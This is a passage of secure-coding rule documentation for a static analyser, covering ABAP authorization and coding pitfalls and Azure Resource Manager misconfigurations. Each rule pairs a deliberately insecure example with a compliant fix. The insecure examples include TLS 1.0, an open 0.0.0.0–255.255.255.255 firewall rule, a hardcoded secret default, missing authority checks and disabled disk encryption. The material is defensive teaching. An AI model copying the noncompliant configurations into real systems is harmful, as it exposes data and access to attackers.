  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

DATA: ip TYPE string VALUE '192.168.12.42'.

Compliant Solution

READ DATASET file INTO ip MAXIMUM LENGTH len.

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

abap:S5117

Why is this an issue?

Every AUTHORITY-CHECK statement sets the fields SY-SUBRC (also accessible as SYST-SUBRC) to the authorization check result. Thus SY-SUBRC value should be checked just after every AUTHORITY-CHECK statement.

Noncompliant code example

AUTHORITY-CHECK OBJECT 'S_MYOBJ' "Noncompliant
    ID 'ID1' FIELD myvalue.

Compliant solution

AUTHORITY-CHECK OBJECT 'S_MYOBJ'  "Compliant
    ID 'ID1' FIELD myvalue.

  IF sy-subrc <> 0.
    MESSAGE 'NOT AUTHORIZED' TYPE 'E'.
  ENDIF.

Exceptions

No issue will be raised in the following cases:

  • One or more WRITE operation are performed between the AUTHORITY-CHECK statement and SY-SUBRC check. An exception will be however raised if the WRITE operation is a WRITE ... TO statement, as this will set again SY-SUBRC.
  • SY-SUBRC's value is assigned to a variable. We then assume that it will be checked later.
AUTHORITY-CHECK OBJECT 'S_MYOBJ'  "Compliant
    ID 'ID1' FIELD myvalue.
WRITE 'Test' " WRITE is accepted before checking SY-SUBRC
IF SY-SUBRC <> 0.
    EXIT.
ENDIF.

AUTHORITY-CHECK OBJECT 'S_MYOBJ'  "Compliant
    ID 'ID1' FIELD myvalue.
Tmp = SY-SUBRC " Assigning SY-SUBRC value to a variable. We assume that it will be checked later.
IF Tmp <> 0.
    EXIT.
ENDIF.
abap:S1674

Why is this an issue?

Leaving a CATCH block empty means that the exception in question is neither handled nor passed forward to callers for handling at a higher level. Suppressing errors rather than handling them could lead to unpredictable system behavior and should be avoided.

Noncompliant code example

  try.
    if ABS( NUMBER ) > 100.
      write / 'Number is large'.
    endif.
    catch CX_SY_ARITHMETIC_ERROR into OREF.
  endtry.

Compliant solution

  try.
    if ABS( NUMBER ) > 100.
      write / 'Number is large'.
    endif.
  catch CX_SY_ARITHMETIC_ERROR into OREF.
    write / OREF->GET_TEXT( ).
  endtry.

Exceptions

When a block contains a comment, it is not considered to be empty.

Resources

  • MITRE, CWE-391 - Unchecked Error Condition
  • OWASP Top 10 2017 Category A10 - Insufficient Logging & Monitoring
abap:S5115

Why is this an issue?

Checking logged users' permissions by comparing their name to a hardcoded string can create security vulnerabilities. It prevents system administrators from changing users' permissions when needed (example: when their account has been compromised). Thus system fields SY-UNAME and SYST-UNAME should not be compared to hardcoded strings. Use instead AUTHORITY-CHECK to check users' permissions.

This rule raises an issue when either of the system fields SY-UNAME or SYST-UNAME are compared to a hardcoded value in a CASE statement or using one of the following operators: =, EQ, <>, NE.

Noncompliant code example

IF SY-UNAME = 'ALICE'. " Noncompliant
ENDIF.

CASE SY-UNAME.
WHEN 'A'. " Noncompliant
ENDCASE.

Compliant solution

AUTHORITY-CHECK OBJECT 'S_CARRID'
  ID 'CARRID' FIELD mycarrid.
IF sy-subrc <> 0.
  MESSAGE 'Not authorized' TYPE 'E'.
ENDIF.
abap:S1486

Why is this an issue?

A BREAK-POINT statement is used when debugging an application with help of the ABAP Debugger. But such debugging statements could make an application vulnerable to attackers, and should not be left in the source code.

Noncompliant code example

IF wv_parallel EQ 'X'.
  BREAK-POINT.
  WAIT UNTIL g_nb_return EQ wv_nb_call.
ENDIF.

Compliant solution

IF wv_parallel EQ 'X'.
  WAIT UNTIL g_nb_return EQ wv_nb_call.
ENDIF.

Resources

abap:S2809

Using "CALL TRANSACTION" statements without an authority check is security sensitive. Its access should be restricted to specific users.

This rule raises when a CALL TRANSACTION has no explicit authorization check, i.e. when:

  • the CALL TRANSACTION statement is not followed by WITH AUTHORITY-CHECK.
  • the CALL TRANSACTION statement is not following an AUTHORITY-CHECK statement.
  • the CALL TRANSACTION statement is not following a call to the AUTHORITY_CHECK_TCODE function.

Ask Yourself Whether

  • the CALL TRANSACTION statement is restricted to the right users.

There is a risk if you answered no to this question.

Recommended Secure Coding Practices

Check current user’s authorization before every CALL TRANSACTION statement. Since ABAP 7.4 this should be done by appending WITH AUTHORITY-CHECK to CALL TRANSACTION statements. In earlier versions the AUTHORITY-CHECK statement or a call to the AUTHORITY_CHECK_TCODE function can be used.

Note that since ABAP 7.4 any CALL TRANSACTION statement not followed by WITH AUTHORITY-CHECK or WITHOUT AUTHORITY-CHECK is obsolete.

Sensitive Code Example

CALL TRANSACTION 'MY_DIALOG'.  " Sensitive as there is no apparent authorization check. It is also obsolete since ABAP 7.4.

Compliant Solution

AUTHORITY-CHECK OBJECT 'S_DIAGID'
                  ID 'ACTVT' FIELD '03'.
IF sy-subrc <> 0.
  " show an error message...
ENDIF.

CALL TRANSACTION 'MY_DIALOG'. " Ok but obsolete since ABAP 7.4.

or

CALL FUNCTION 'AUTHORITY_CHECK_TCODE'
  exporting
    tcode  = up_fdta
  exceptions
    ok     = 0
    others = 4.
IF sy-subrc <> 0.
  " show an error message...
ENDIF.

CALL TRANSACTION up_fdta USING up_bdc mode 'E'. " Ok but obsolete since ABAP 7.4.

or

CALL TRANSACTION 'MY_DIALOG' WITH AUTHORITY-CHECK. " Recommended way since ABAP 7.4.

Exceptions

No issue will be raised when CALL TRANSACTION is followed by WITHOUT AUTHORITY-CHECK as it explicitly says that the TRANSACTION does not require an authorization check.

See

abap:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

This rule raises an issue when MD5_CALCULATE_HASH_FOR_RAW or MD5_CALCULATE_HASH_FOR_CHAR functions are used.

See

azureresourcemanager:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Databases

Code examples

The following code samples are equivalent For Azure Database for MySQL servers, Azure Database for PostgreSQL servers, and Azure Database for MariaDB servers.

For all of these, there is no minimal TLS version enforced by default.

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "name": "example",
      "properties": {
        "minimalTlsVersion": "TLS1_0"
      }
    }
  ]
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "name": "example",
      "properties": {
        "minimalTlsVersion": "TLS1_2"
      }
    }
  ]
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

azureresourcemanager:S6656

When using nested deployments in Azure, template expressions can be evaluated within the scope of the parent template or the scope of the nested template. If such a template expression evaluates a secure value of the parent template, it is possible to expose this value in the deployment history.

Why is this an issue?

Parameters with the type securestring and secureObject are designed to pass sensitive data to the resources being deployed. Secure parameters cannot be accessed after the deployment is completed: they can neither be logged nor used as an output.

When used in nested deployments, however, it is possible to embed secure parameters in such a way they can be visible afterward.

What is the potential impact?

If the nested deployment contains a secure parameter in this way, then the value of this parameter may be readable in the deployment history. This can lead to important credentials being leaked to unauthorized accounts.

How to fix it in ARM Templates

By setting properties.expressionEvaluationOptions.scope to Inner in the parent template, template evaluations are limited to the scope of the nested template. This makes it impossible to expose secure parameters defined in the parent template.

Code examples

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "adminUsername": {
      "type": "securestring",
      "defaultValue": "[newGuid()]"
    }
  },
  "resources": [
    {
      "type": "Microsoft.Resources/deployments",
      "apiVersion": "2022-09-01",
      "properties": {
        "mode": "Incremental",
        "template": {
          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
          "contentVersion": "1.0.0.0",
          "resources": [
            {
              "type": "Microsoft.Compute/virtualMachines",
              "apiVersion": "2022-11-01",
              "properties": {
                "osProfile": {
                  "adminUsername": "[parameters('adminUsername')]"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Resources/deployments",
      "apiVersion": "2022-09-01",
      "properties": {
        "expressionEvaluationOptions": {
          "scope": "Inner"
        },
        "mode": "Incremental",
        "template": {
          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
          "contentVersion": "1.0.0.0",
          "parameters": {
            "adminUsername": {
              "type": "securestring",
              "defaultValue": "[newGuid()]"
            }
          },
          "resources": [
            {
              "type": "Microsoft.Compute/virtualMachines",
              "apiVersion": "2022-11-01",
              "properties": {
                "osProfile": {
                  "adminUsername": "[parameters('adminUsername')]"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Resources

Documentation

Standards

  • MITRE, CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
  • MITRE, CWE-532 - Insertion of Sensitive Information into Log File
azureresourcemanager:S6648

Azure Resource Manager templates define parameters as a way to reuse templates in different environments. Secure parameters (secure strings and secure objects) should not be assigned a default value.

Why is this an issue?

Parameters with the type securestring and secureObject are designed to pass sensitive data to the resources being deployed. Unlike other data types, they cannot be accessed after the deployment is completed. They can neither be logged nor used as an output.

Secure parameters can be assigned a default value which will be used if the parameter is not supplied. This default value is not protected and is stored in cleartext in the deployment history.

What is the potential impact?

If the default value contains a secret, it will be disclosed to all accounts that have read access to the deployment history.

How to fix it in ARM templates

Code examples

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "secretValue": {
      "type": "securestring",
      "defaultValue": "S3CR3T"
    }
  }
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "secretValue": {
      "type": "securestring"
    }
  }
}

Resources

Documentation

Standards

  • MITRE, CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
  • MITRE, CWE-532 - Insertion of Sensitive Information into Log File
azureresourcemanager:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

Using publicNetworkAccess to control access to resources:

resource exampleSite "Microsoft.Web/sites@2020-12-01" {
  name: 'example-site'
  properties: {
    publicNetworkAccess: 'Enabled'
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example-site",
      "properties": {
        "siteConfig": {
          "publicNetworkAccess": "Enabled"
        }
      }
    }
  ]
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example",
      "resources": [
        {
          "type": "config",
          "apiVersion": "2020-12-01",
          "name": "example-config",
          "properties": {
            "publicNetworkAccess": "Enabled"
          }
        }
      ]
    }
  ]
}

Using IP address ranges to control access to resources:

resource exampleFirewall "Microsoft.Sql/servers/firewallRules@2014-04-01" {
  name: 'example-firewall'
  properties: {
    startIpAddress: '0.0.0.0'
    endIpAddress: '255.255.255.255'
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/firewallRules",
      "apiVersion": "2014-04-01",
      "name": "example-firewall",
      "properties": {
        "startIpAddress": "0.0.0.0",
        "endIpAddress": "255.255.255.255"
      }
    }
  ]
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers",
      "apiVersion": "2014-04-01",
      "name": "example-database",
      "resources": [
        {
          "type": "firewallRules",
          "apiVersion": "2014-04-01",
          "name": "example-firewall",
          "properties": {
            "startIpAddress": "0.0.0.0",
            "endIpAddress": "255.255.255.255"
          }
        }
      ]
    }
  ]
}

Compliant Solution

Using publicNetworkAccess to control access to resources:

resource exampleSite "Microsoft.Web/sites@2020-12-01" {
  name: 'example-site'
  properties: {
    publicNetworkAccess: 'Disabled'
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example-site",
      "properties": {
        "siteConfig": {
          "publicNetworkAccess": "Disabled"
        }
      }
    }
  ]
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example-site",
      "resources": [
        {
          "type": "config",
          "apiVersion": "2020-12-01",
          "name": "example-config",
          "properties": {
            "publicNetworkAccess": "Disabled"
          }
        }
      ]
    }
  ]
}

Using IP address ranges to control access to resources:

resource exampleFirewall "Microsoft.Sql/servers/firewallRules@2014-04-01" {
  name: 'example-firewall'
  properties: {
    startIpAddress: '192.168.0.0'
    endIpAddress: '192.168.255.255'
  }
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/firewallRules",
      "apiVersion": "2014-04-01",
      "name": "example-firewall",
      "properties": {
        "startIpAddress": "192.168.0.0",
        "endIpAddress": "192.168.255.255"
      }
    }
  ]
}
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers",
      "apiVersion": "2014-04-01",
      "name": "example-database",
      "resources": [
        {
          "type": "firewallRules",
          "apiVersion": "2014-04-01",
          "name": "example-firewall",
          "properties": {
            "startIpAddress": "192.168.0.0",
            "endIpAddress": "192.168.255.255"
          }
        }
      ]
    }
  ]
}

See

azureresourcemanager:S6378

Disabling Managed Identities can reduce an organization’s ability to protect itself against configuration faults and credentials leaks.

Authenticating via managed identities to an Azure resource solely relies on an API call with a non-secret token. The process is inner to Azure: secrets used by Azure are not even accessible to end-users.

In typical scenarios without managed identities, the use of credentials can lead to mistakenly leaving them in code bases. In addition, configuration faults may also happen when storing these values or assigning them permissions.

By transparently taking care of the Azure Active Directory authentication, Managed Identities allow getting rid of day-to-day credentials management.

Ask Yourself Whether

The resource:

  • Needs to authenticate to Azure resources that support Azure Active Directory (AAD).
  • Uses a different Access Control system that doesn’t guarantee the same security controls as AAD, or no Access Control system at all.

There is a risk if you answered yes to all of those questions.

Recommended Secure Coding Practices

Enable the Managed Identities capabilities of this Azure resource. If supported, use a System-Assigned managed identity, as:

  • It cannot be shared across resources.
  • Its life cycle is deeply tied to the life cycle of its Azure resource.
  • It provides a unique independent identity.

Alternatively, User-Assigned Managed Identities can also be used but don’t guarantee the properties listed above.

Sensitive Code Example

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "apiManagementService",
        }
    ]
}

Compliant Solution

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "apiManagementService",
            "identity": {
                "type": "SystemAssigned"
            }
        }
    ]
}

See

azureresourcemanager:S6388

Using unencrypted cloud storages can lead to data exposure. In the case that adversaries gain physical access to the storage medium they are able to access unencrypted information.

Ask Yourself Whether

  • The service contains sensitive information that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt cloud storages that contain sensitive information.

Sensitive Code Example

For Microsoft.AzureArcData/sqlServerInstances/databases:

Disabled encryption on SQL service instance database:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.AzureArcData/sqlServerInstances/databases",
      "apiVersion": "2023-03-15-preview",
      "properties": {
        "databaseOptions": {
          "isEncrypted": false
        }
      }
    }
  ]
}

For Microsoft.Compute/snapshots:

Disabled disk encryption with settings collection:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryptionSettingsCollection": {
          "enabled": false
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachines:

Disabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "securityProfile": {
          "encryptionAtHost": false
        }
      }
    }
  ]
}

Disabled encryption for managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "dataDisks": [
            {
              "id": "myDiskId",
            }
          ]
        }
      }
    }
  ]
}

Disabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "encryptionSettings": {
              "enabled": false
            }
          }
        }
      }
    }
  ]
}

Disabled encryption for OS managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "managedDisk": {
              "id": "myDiskId",
            }
          }
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachineScaleSets:

Disabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "securityProfile": {
            "encryptionAtHost": false
          }
        }
      }
    }
  ]
}

Disabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "dataDisks": [
              {
                "name": "myDataDisk"
              }
            ]
          }
        }
      }
    }
  ]
}

Disabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "osDisk": {
              "name": "myOsDisk"
            }
          }
        }
      }
    }
  ]
}

For Microsoft.ContainerService/managedClusters:

Disabled encryption at host and set the disk encryption set ID:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-02-preview",
      "properties": {
        "agentPoolProfiles": [
          {
            "enableEncryptionAtHost": false
          }
        ]
      }
    }
  ]
}

For Microsoft.DataLakeStore/accounts:

Disabled encryption for Data Lake Store:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataLakeStore/accounts",
      "apiVersion": "2016-11-01",
      "properties": {
        "encryptionState": "Disabled"
      }
    }
  ]
}

For Microsoft.DBforMySQL/servers:

Disabled infrastructure double encryption for MySQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Disabled"
      }
    }
  ]
}

For Microsoft.DBforPostgreSQL/servers:

Disabled infrastructure double encryption for PostgreSQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforPostgreSQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Disabled"
      }
    }
  ]
}

For Microsoft.DocumentDB/cassandraClusters/dataCenters:

Disabled encryption for a Cassandra Cluster datacenter’s managed disk and backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters/dataCenters",
      "apiVersion": "2023-04-15",
      "properties": {
        "diskCapacity": 4
      }
    }
  ]
}

For Microsoft.HDInsight/clusters:

Disabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": false
            }
          ]
        }
      }
    }
  ]
}

Disabled encryption for data disk at application level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters/applications",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": false
            }
          ]
        }
      }
    }
  ]
}

Disabled encryption for resource disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "diskEncryptionProperties": {
          "encryptionAtHost": false
        }
      }
    }
  ]
}

For Microsoft.Kusto/clusters:

Disabled encryption for disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Kusto/clusters",
      "apiVersion": "2022-12-29",
      "properties": {
        "enableDiskEncryption": false
      }
    }
  ]
}

For Microsoft.RecoveryServices/vaults:

Disabled encryption for disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "properties": {
        "encryption": {
          "infrastructureEncryption": "Disabled"
        }
      }
    }
  ]
}

Disabled encryption on infastructure for backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults/backupEncryptionConfigs",
      "apiVersion": "2023-01-01",
      "properties": {
        "infrastructureEncryptionState": "Disabled"
      }
    }
  ]
}

For Microsoft.RedHatOpenShift/openShiftClusters:

Disabled disk encryption for master profile and worker profiles:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RedHatOpenShift/openShiftClusters",
      "apiVersion": "2022-09-04",
      "properties": {
        "masterProfile": {
          "encryptionAtHost": "Disabled"
        },
        "workerProfiles": [
          {
            "encryptionAtHost": "Disabled"
          }
        ]
      }
    }
  ]
}

For Microsoft.SqlVirtualMachine/sqlVirtualMachines:

Disabled encryption for SQL Virtual Machine:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
